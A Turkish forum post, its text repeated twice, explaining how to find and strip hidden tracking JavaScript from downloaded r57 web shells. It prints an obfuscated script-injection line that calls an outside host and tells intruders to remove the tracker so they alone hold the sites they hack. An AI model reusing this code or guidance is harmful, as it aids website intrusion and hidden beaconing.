Loglu Shell Nasıl Anlaşılır ?
Loglu Shell Ne İşe Yarar? : Shelli Attığınız Siteleri Kayıt Eder Bir Keylogger Gibi
Hemen Netten Bir Shell Bankasın’a Giriyoruz.
Önümüze Gelen Siteye Girdik : http://www.r57.gen.tr/
Evet R57 Shell’imizi İndirdik ve Notepad++ Editörümüzle Açtık Ve İnceliyoruz..
.js Olarak Arattığımızda Karşımıza Çıkan Birinci Element
’ ciz.js ’ )
Gördüğünüz Gibi Loglu Shell Yapımında Kullanılan ’JavaScript’ Kodları Var. Bunları Bulmak İçin .js diye Aratabiliriz.
Bunlardan Kurtulmak İçinde JS Kodunu Silmeniz Yeterlidir.
başka bir yöntem
Öncelikle log tutan shellin ne özelliği var onu anlatayım.
Diyelimki sizde bir shell var.Ve siteye shell sokacaksınız veya RFI ile bağlanacaksanız.Eğer shell sokar veya RFI ile bağlanırsanız
shell yayını yapan siteye sizin hackliyeceğiniz sitenin adresi gider.Gidincede site sahibi sizin soktuğunuz shelli görür ve shelle bağlanır.
Anlıyacağınız siteyi tek hackliyecek olan siz olmazsınız.
Log Tutan site nasıl anlaşılır?
öncelikle shell yayını yapan sitemize bağlanalım.
Örneğin;
www.deneme12345.com/yayin/r57.txt
Shelle bağlandıktan sonra ctrl+f yapıyoruz.
Karşınıza küçük bir arama bölümü çıkacak.Arama boşluğuna <script yazıp enterlıyoruz.Karşınıza aşağıdaki yazılar gelene kadar
enterlayın.Eğer aşağıda yazıklarım karşınıza çıkarsa.Bilinki site log tutuyor demektir.
-------------------------------------------------------------
<script type="text/javascript">document.write(’\\u003c\\u0053\\u0043\\u0052\\u0049\\u0050\\u0054\\u0020\\u0053\\u0052\\u0043\\u003d\\u0068\\u0074\\u0074\\u0070\\u003a\\u002f\\u002f\\u0077\\u0077\\u0077\\u002e\\u006d\\u0065\\u0074\\u0061\\u006c\\u0074\\u0065\\u0061\\u006d\\u002e\\u006f\\u0072\\u0067\\u002f\\u0062\\u0061\\u0074\\u0061\\u006b\\u002f\\u0063\\u006f\\u006f\\u006b\\u0069\\u0065\\u002e\\u006a\\u0073\\u003e\\u003c\\u002f\\u0053\\u0043\\u0052\\u0049\\u0050\\u0054\\u003e’)</script>
<?php
ve
<SCRIPT SRC=http://www.siteadresi.org/yayin/ciz.js></SCRIPT>
-------------------------------------------------------------
Bu gördüğünüz kodlar karşınıza çıkarsa shellinizi silin gitsin.
Loglu Shell Ne İşe Yarar? : Shelli Attığınız Siteleri Kayıt Eder Bir Keylogger Gibi
Hemen Netten Bir Shell Bankasın’a Giriyoruz.
Önümüze Gelen Siteye Girdik : http://www.r57.gen.tr/
Evet R57 Shell’imizi İndirdik ve Notepad++ Editörümüzle Açtık Ve İnceliyoruz..
.js Olarak Arattığımızda Karşımıza Çıkan Birinci Element
’ ciz.js ’ )
Gördüğünüz Gibi Loglu Shell Yapımında Kullanılan ’JavaScript’ Kodları Var. Bunları Bulmak İçin .js diye Aratabiliriz.
Bunlardan Kurtulmak İçinde JS Kodunu Silmeniz Yeterlidir.
başka bir yöntem
Öncelikle log tutan shellin ne özelliği var onu anlatayım.
Diyelimki sizde bir shell var.Ve siteye shell sokacaksınız veya RFI ile bağlanacaksanız.Eğer shell sokar veya RFI ile bağlanırsanız
shell yayını yapan siteye sizin hackliyeceğiniz sitenin adresi gider.Gidincede site sahibi sizin soktuğunuz shelli görür ve shelle bağlanır.
Anlıyacağınız siteyi tek hackliyecek olan siz olmazsınız.
Log Tutan site nasıl anlaşılır?
öncelikle shell yayını yapan sitemize bağlanalım.
Örneğin;
www.deneme12345.com/yayin/r57.txt
Shelle bağlandıktan sonra ctrl+f yapıyoruz.
Karşınıza küçük bir arama bölümü çıkacak.Arama boşluğuna <script yazıp enterlıyoruz.Karşınıza aşağıdaki yazılar gelene kadar
enterlayın.Eğer aşağıda yazıklarım karşınıza çıkarsa.Bilinki site log tutuyor demektir.
-------------------------------------------------------------
<script type="text/javascript">document.write(’\\u003c\\u0053\\u0043\\u0052\\u0049\\u0050\\u0054\\u0020\\u0053\\u0052\\u0043\\u003d\\u0068\\u0074\\u0074\\u0070\\u003a\\u002f\\u002f\\u0077\\u0077\\u0077\\u002e\\u006d\\u0065\\u0074\\u0061\\u006c\\u0074\\u0065\\u0061\\u006d\\u002e\\u006f\\u0072\\u0067\\u002f\\u0062\\u0061\\u0074\\u0061\\u006b\\u002f\\u0063\\u006f\\u006f\\u006b\\u0069\\u0065\\u002e\\u006a\\u0073\\u003e\\u003c\\u002f\\u0053\\u0043\\u0052\\u0049\\u0050\\u0054\\u003e’)</script>
<?php
ve
<SCRIPT SRC=http://www.siteadresi.org/yayin/ciz.js></SCRIPT>
-------------------------------------------------------------
Bu gördüğünüz kodlar karşınıza çıkarsa shellinizi silin gitsin.
